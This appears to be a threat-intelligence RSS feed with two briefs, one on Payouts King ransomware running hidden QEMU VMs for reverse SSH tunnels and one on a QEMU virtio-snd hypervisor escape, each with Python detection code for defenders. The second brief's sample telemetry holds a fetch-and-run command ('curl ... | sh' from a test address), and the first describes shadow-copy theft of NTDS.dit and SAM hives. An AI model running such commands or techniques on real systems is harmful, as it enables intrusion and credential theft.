<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Qemu — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/qemu/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata — refreshed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Sat, 18 Apr 2026 12:00:00 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/qemu/feed.xml" rel="self" type="application/rss+xml"/><item><title>Payouts King Ransomware Abusing QEMU VMs for Defense Evasion</title><link>https://feed.craftedsignal.io/briefs/2026-04-payouts-king-qemu/</link><pubDate>Sat, 18 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-payouts-king-qemu/</guid><description>The Payouts King ransomware is leveraging QEMU VMs as a reverse SSH backdoor to execute payloads, store malicious files, and establish covert remote access tunnels, bypassing endpoint security measures.</description><content:encoded><![CDATA[<p>The Payouts King ransomware, associated with the GOLD ENCOUNTER threat group, is using QEMU, an open-source machine emulator and virtualizer, to run hidden Alpine Linux virtual machines (VMs) on compromised Windows systems. Because the attacker tooling executes inside the guest, host-based endpoint security sees only a QEMU process and its disk files: payloads run, stolen data is staged, and covert remote access tunnels are established over SSH without tripping host-side controls. Observed since November 2025 (tracked as STAC4713), the campaign initially exploited exposed SonicWall VPNs and the SolarWinds Web Help Desk vulnerability (CVE-2025-26399).
More recent attacks have used exposed Cisco SSL VPNs and Microsoft Teams phishing to deliver payloads. Based on overlapping initial access methods, the operators are likely former Black Basta affiliates. The hidden VM gives them persistence, SYSTEM-level execution, and a staging point for data exfiltration while evading detection.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Access:</strong> Attackers gain initial access through exposed SonicWall VPNs, Cisco SSL VPNs, or by exploiting the SolarWinds Web Help Desk vulnerability (CVE-2025-26399). Alternatively, they use Microsoft Teams phishing, tricking employees into downloading and executing malicious files via QuickAssist.</li>
<li><strong>Payload Delivery:</strong> In some instances, a legitimate ADNotificationManager.exe binary is used to sideload a Havoc C2 payload (vcruntime140_1.dll).</li>
<li><strong>QEMU Deployment:</strong> A scheduled task named ‘TPMProfiler’ is created to launch a hidden QEMU VM as SYSTEM, utilizing virtual disk files disguised as databases and DLL files.</li>
<li><strong>VM Configuration:</strong> The QEMU VM runs Alpine Linux (version 3.22.0), containing attacker tools such as AdaptixC2, Chisel, BusyBox, and Rclone.</li>
<li><strong>Reverse SSH Tunnel:</strong> Port forwarding is configured on the VM and a reverse SSH tunnel is established from the guest to attacker infrastructure, giving covert access to the infected host. With QEMU user-mode networking the guest's traffic leaves the machine as an ordinary outbound connection from the QEMU process, which is all that host firewalls and EDR see.</li>
<li><strong>Credential Access:</strong> Attackers use VSS (vssuirun.exe) to create a shadow copy, then use the Windows print command over SMB to copy NTDS.dit and the SAM and SYSTEM hives out of the shadow copy into temp directories.</li>
<li><strong>Data Exfiltration:</strong> Rclone pushes the staged data to a remote SFTP server; FTP has also been used.</li>
<li><strong>Encryption and Extortion:</strong> The Payouts King ransomware encrypts systems with AES-256 in CTR mode combined with RSA-4096, using intermittent encryption for larger files. Ransom notes are dropped, directing victims to leak sites on the dark web.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful Payouts King ransomware attacks can result in significant data loss, system downtime, and financial repercussions for victim organizations. The use of QEMU VMs provides an additional layer of stealth, making detection and remediation more challenging. Targeted sectors are not specified in this report, but the use of exposed VPNs and phishing suggests a broad targeting scope. The ransom demands and potential data leaks on the dark web further compound the damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor for unauthorized QEMU installations and for scheduled tasks that launch them with SYSTEM privileges; a headless QEMU process whose disk images carry non-disk extensions (.db, .dll) is a key indicator of compromise (see Overview).</li>
<li>Implement network monitoring for unusual SSH port forwarding and outbound SSH on non-standard ports, and treat any outbound SSH or long-lived connection whose originating process is qemu-system-*.exe as a likely reverse tunnel (see Attack Chain).</li>
<li>Deploy the Sigma rule &ldquo;Detect ADNotificationManager Sideloading Havoc C2&rdquo; to identify instances where ADNotificationManager.exe is used to sideload the Havoc C2 payload (vcruntime140_1.dll) (see Rules).</li>
<li>Review and patch CVE-2025-26399 in SolarWinds Web Help Desk and apply necessary security measures for exposed SonicWall and Cisco SSL VPNs to prevent initial access (see Attack Chain).</li>
<li>Monitor for processes creating shadow copies (vssuirun.exe) followed by unusual file access patterns (NTDS.dit, SAM, SYSTEM hives) via SMB, indicative of credential theft (see Attack Chain).</li>
</ul>
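<p>As an added example (not code from the original brief or from CraftedSignal's rule set), the following Python scores Sysmon-style process-creation events for the pattern described in the attack chain above: QEMU launched headless by the Task Scheduler as SYSTEM, fed disk images with non-disk extensions, and configured with hostfwd port forwarding to the guest's SSH port. The field names follow Sysmon Event ID 1; the sample events, paths and scheduled-task layout are constructed for illustration, and the alert threshold is an assumption to tune against your own baseline of legitimate QEMU use.</p>

```python
import ntpath
import re

# Extensions a QEMU disk image normally carries; a -drive pointing elsewhere is suspicious.
DISK_EXTENSIONS = {".qcow2", ".qcow", ".img", ".raw", ".iso", ".vmdk", ".vdi", ".vhd", ".vhdx", ".qed"}
# Arguments that identify QEMU even when the binary has been renamed.
QEMU_FLAGS = {"-drive", "-netdev", "-hda", "-hdb", "-cdrom", "-accel", "-display", "-nographic", "-nic"}
ALERT_THRESHOLD = 3  # assumption: tune against your baseline of legitimate QEMU use

# Constructed Sysmon Event ID 1 style events (illustrative, not real telemetry).
SAMPLE_EVENTS = [
    {   # hidden VM started by the Task Scheduler as SYSTEM, disk disguised as a .db file
        "Image": r"C:\ProgramData\TPM\qemu-system-x86_64.exe",
        "CommandLine": r'"C:\ProgramData\TPM\qemu-system-x86_64.exe" -m 1024 -display none '
                       r"-drive file=C:\ProgramData\TPM\profiler.db,format=qcow2 "
                       r"-netdev user,id=n0,hostfwd=tcp:127.0.0.1:2222-:22 -device e1000,netdev=n0",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "ParentCommandLine": r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",
        "User": r"NT AUTHORITY\SYSTEM",
    },
    {   # benign: a developer running a VM interactively
        "Image": r"C:\Program Files\qemu\qemu-system-x86_64.exe",
        "CommandLine": r'"C:\Program Files\qemu\qemu-system-x86_64.exe" -m 2048 '
                       r"-drive file=C:\Users\dev\vm\alpine.qcow2,format=qcow2",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": r'"C:\Windows\System32\cmd.exe"',
        "User": r"CORP\dev",
    },
    {   # unrelated SYSTEM process; must be ignored
        "Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "ParentCommandLine": r"C:\Windows\system32\svchost.exe -k DcomLaunch -p",
        "User": r"NT AUTHORITY\SYSTEM",
    },
]


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def drive_paths(tokens):
    """Yield the file paths handed to QEMU via -drive file=..., -hda/-hdb and -cdrom."""
    for tok, nxt in zip(tokens, tokens[1:]):
        if tok == "-drive":
            for opt in nxt.split(","):
                if opt.startswith("file="):
                    yield opt[len("file="):]
        elif tok in ("-hda", "-hdb", "-cdrom"):
            yield nxt


def hostfwd_guest_ports(tokens):
    """Guest ports exposed on the host via hostfwd=proto:hostaddr:hostport-guestaddr:guestport."""
    ports = []
    for tok in tokens:
        for m in re.finditer(r"hostfwd=(?:tcp|udp):[^:,]*:\d+-[^:,]*:(\d+)", tok):
            ports.append(int(m.group(1)))
    return ports


def assess(event):
    """Score one process-creation event; returns (score, indicators), or None if it is not QEMU."""
    tokens = tokenize(event["CommandLine"])
    image = ntpath.basename(event["Image"]).lower()
    flags = {t for t in tokens if t.startswith("-")}
    # Match on the binary name, or on the argument set when the binary has been renamed.
    if not image.startswith("qemu-system") and len(flags & QEMU_FLAGS) < 2:
        return None
    indicators = []
    if event["User"].upper() == r"NT AUTHORITY\SYSTEM":
        indicators.append("runs as SYSTEM")
    if (ntpath.basename(event["ParentImage"]).lower() == "svchost.exe"
            and "-s Schedule" in event.get("ParentCommandLine", "")):
        indicators.append("launched by Task Scheduler")
    if "-nographic" in tokens or any(a == "-display" and b == "none" for a, b in zip(tokens, tokens[1:])):
        indicators.append("headless VM")
    for path in drive_paths(tokens):
        if ntpath.splitext(path)[1].lower() not in DISK_EXTENSIONS:
            indicators.append(f"disk image with non-disk extension: {path}")
    for port in hostfwd_guest_ports(tokens):
        indicators.append(f"hostfwd exposes guest port {port}" + (" (SSH)" if port == 22 else ""))
    if not image.startswith("qemu-system"):
        indicators.append(f"renamed QEMU binary: {image}")
    return len(indicators), indicators


def find_hidden_vms(events, threshold=ALERT_THRESHOLD):
    """Return the events whose indicator count reaches the alert threshold."""
    hits = []
    for ev in events:
        result = assess(ev)
        if result and result[0] >= threshold:
            hits.append({"Image": ev["Image"], "score": result[0], "indicators": result[1]})
    return hits


if __name__ == "__main__":
    for hit in find_hidden_vms(SAMPLE_EVENTS):
        print(hit["Image"], hit["score"], *hit["indicators"], sep="\n  ")
```

Map your exported Sysmon or 4688 fields onto the same keys and run the scorer over them. The argument-based fallback catches a renamed binary, the extension check matches the disk files disguised as databases and DLLs, and the hostfwd parser reports which guest ports the operator chose to expose on the host, so a forward to port 22 can be weighted more heavily than the other indicators if your environment never uses it.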
]]></content:encoded><category domain="severity">critical</category><category domain="type">threat</category><category>payouts-king</category><category>ransomware</category><category>qemu</category><category>vm</category><category>defense-evasion</category></item><item><title>QEMU Hypervisor Escape via virtio-snd 0-Day</title><link>https://feed.craftedsignal.io/briefs/2026-03-qemu-escape/</link><pubDate>Thu, 19 Mar 2026 05:19:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-qemu-escape/</guid><description>An unpatched vulnerability in QEMU's virtio-snd component allows for a hypervisor escape due to an uncontrolled heap overflow.</description><content:encoded><![CDATA[<p>A recently disclosed vulnerability in the QEMU virtualization platform allows a malicious guest operating system to escape the hypervisor and potentially execute code on the host system. The vulnerability resides in the <code>virtio-snd</code> component, which emulates a sound card for virtual machines. The root cause is an uncontrolled heap overflow that can be triggered by a specially crafted audio stream sent from the guest to the host. While specific details of the vulnerability and its exploitation are not provided in the source document, it is important for defenders to understand the potential impact of such a vulnerability and take appropriate measures to mitigate the risk. Successfully exploiting this type of vulnerability would allow an attacker to gain complete control over the underlying host system.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to a guest virtual machine (VM) through a compromised application or vulnerable service running within the VM.</li>
<li>The attacker leverages their access within the guest VM to send a specially crafted audio stream to the emulated <code>virtio-snd</code> device.</li>
<li>The crafted audio stream triggers an uncontrolled heap overflow within the QEMU process on the host system.</li>
<li>The heap overflow corrupts memory on the host system, potentially overwriting critical data structures or code.</li>
<li>The attacker carefully manipulates the heap overflow to overwrite function pointers or other execution control data within the QEMU process.</li>
<li>When the QEMU process attempts to execute the overwritten function pointer, control is redirected to attacker-controlled code.</li>
<li>The attacker&rsquo;s code executes within the context of the QEMU process on the host system, allowing them to bypass the VM&rsquo;s isolation.</li>
<li>Because QEMU is normally run as an unprivileged, often sandboxed, user on the host, the attacker then needs a further local privilege escalation to gain root and compromise the entire system.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this QEMU hypervisor escape vulnerability allows a malicious guest operating system to gain complete control over the host system. This can lead to data theft, system compromise, and further lateral movement within the network. The potential impact is significant, especially in cloud environments where multiple VMs share the same physical hardware. Even though specific victim numbers are unavailable, the wide deployment of QEMU implies a broad scope of potential targets across various sectors.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor process creation events on the hypervisor host for QEMU processes spawning child processes with unexpected command-line arguments, as this could indicate exploitation (see rule: &ldquo;Detect QEMU Process Spawning Shell&rdquo;).</li>
<li>Enable network connection logging for QEMU processes on the hypervisor host to detect connections to unusual or malicious IP addresses, which may be used for command and control after a hypervisor escape (see rule: &ldquo;Detect QEMU Outbound Network Connection&rdquo;). With user-mode (slirp) networking the QEMU process itself legitimately opens host sockets on the guest&rsquo;s behalf, so baseline each host&rsquo;s network backends (tap/bridge versus user) before alerting on this.</li>
<li>Inventory which guests have a <code>virtio-snd</code> device attached: only those expose the vulnerable code, so detach the device from VMs that do not need emulated audio. On the remaining guests, investigate unusual behavior such as unexpected resource utilization or network activity, which may indicate an attempt to exploit the vulnerability.</li>
</ul>
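<p>As an added example (not code from the original brief or from CraftedSignal's rule set), the following Python implements the two host-side checks recommended above over constructed process and connection telemetry: a qemu-system process spawning anything other than its own bridge helper, and outbound connects from a QEMU process or its descendants, with the user-mode networking exception applied. The process table, PIDs, addresses (TEST-NET ranges) and the collector layout are constructed; the allowlist of one helper is an assumption to extend with whatever your hypervisor stack legitimately runs from QEMU.</p>

```python
import posixpath
import re

# The only child QEMU itself is expected to exec: the setuid helper used by -netdev bridge.
# Assumption for this example; extend it for your own stack.
ALLOWED_QEMU_CHILDREN = {"qemu-bridge-helper"}

# Constructed sample telemetry (not real host data): a process table and outbound connects,
# in the shape an auditd or eBPF collector might deliver them.
SAMPLE_PROCESSES = [
    {"pid": 2100, "ppid": 1, "uid": 107, "exe": "/usr/bin/qemu-system-x86_64",
     "cmdline": "qemu-system-x86_64 -name guest=web01 -netdev tap,id=n0,ifname=tap0 "
                "-device virtio-net-pci,netdev=n0 -audiodev none,id=a0 -device virtio-sound-pci,audiodev=a0"},
    {"pid": 2188, "ppid": 2100, "uid": 0, "exe": "/usr/lib/qemu/qemu-bridge-helper",
     "cmdline": "qemu-bridge-helper --br=br0 --fd=25"},
    {"pid": 2390, "ppid": 2100, "uid": 107, "exe": "/bin/sh",
     "cmdline": "sh -c curl -s http://203.0.113.10/s | sh"},
    {"pid": 2401, "ppid": 2390, "uid": 107, "exe": "/usr/bin/curl",
     "cmdline": "curl -s http://203.0.113.10/s"},
    {"pid": 1500, "ppid": 1, "uid": 0, "exe": "/usr/bin/rsync",
     "cmdline": "rsync -a /var/lib/libvirt/images/ backup.internal:/vmbackups/"},
]
SAMPLE_CONNECTIONS = [
    {"pid": 2100, "daddr": "203.0.113.10", "dport": 4444},  # the QEMU process itself, tap networking
    {"pid": 2401, "daddr": "203.0.113.10", "dport": 80},    # a descendant of the QEMU process
    {"pid": 1500, "daddr": "10.0.5.20", "dport": 873},      # unrelated backup job
]


def is_qemu(proc):
    return posixpath.basename(proc["exe"]).startswith("qemu-system")


def uses_slirp(cmdline):
    """User-mode networking runs inside the QEMU process, so its own outbound connects are expected."""
    return re.search(r"-(?:netdev|nic)\s+user\b", cmdline) is not None


def exposes_virtio_snd(cmdline):
    """True when the guest was given a virtio-sound device, i.e. can reach the component in this brief."""
    return re.search(r"-device\s+virtio-sound", cmdline) is not None


def qemu_ancestor(proc, by_pid):
    """Walk the parent chain and return the nearest qemu-system ancestor, or None."""
    seen = set()
    cur = by_pid.get(proc["ppid"])
    while cur is not None and cur["pid"] not in seen:
        if is_qemu(cur):
            return cur
        seen.add(cur["pid"])
        cur = by_pid.get(cur["ppid"])
    return None


def qemu_spawns(procs):
    """Direct children of a qemu-system process whose binary is not a known QEMU helper."""
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for p in procs:
        parent = by_pid.get(p["ppid"])
        if parent is None or not is_qemu(parent):
            continue
        if posixpath.basename(p["exe"]) in ALLOWED_QEMU_CHILDREN:
            continue
        findings.append({"pid": p["pid"], "exe": p["exe"], "cmdline": p["cmdline"],
                         "qemu_pid": parent["pid"],
                         "guest_has_virtio_snd": exposes_virtio_snd(parent["cmdline"])})
    return findings


def qemu_outbound(procs, conns):
    """Outbound connects from a QEMU process (unless it does slirp networking) or from any descendant."""
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for c in conns:
        p = by_pid.get(c["pid"])
        if p is None:
            continue
        if is_qemu(p):
            if uses_slirp(p["cmdline"]):
                continue  # expected: slirp opens host sockets on the guest's behalf
            qemu = p
        else:
            qemu = qemu_ancestor(p, by_pid)
            if qemu is None:
                continue
        findings.append({"pid": c["pid"], "exe": p["exe"], "dst": f'{c["daddr"]}:{c["dport"]}',
                         "qemu_pid": qemu["pid"]})
    return findings


if __name__ == "__main__":
    for f in qemu_spawns(SAMPLE_PROCESSES) + qemu_outbound(SAMPLE_PROCESSES, SAMPLE_CONNECTIONS):
        print(f)
```

The spawn check is deliberately strict (an allowlist rather than a shell blocklist) because a post-escape payload need not be a shell; the lineage walk in the connection check catches the curl started from that shell even though the connect is not made by the QEMU process itself. The <code>guest_has_virtio_snd</code> flag is enrichment only: it tells the responder whether the guest in question could have reached the vulnerable device, not that it did.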
]]></content:encoded><category domain="severity">critical</category><category domain="type">threat</category><category>virtualization</category><category>hypervisor</category><category>qemu</category><category>virtio-snd</category><category>heap overflow</category><category>hypervisor escape</category></item></channel></rss>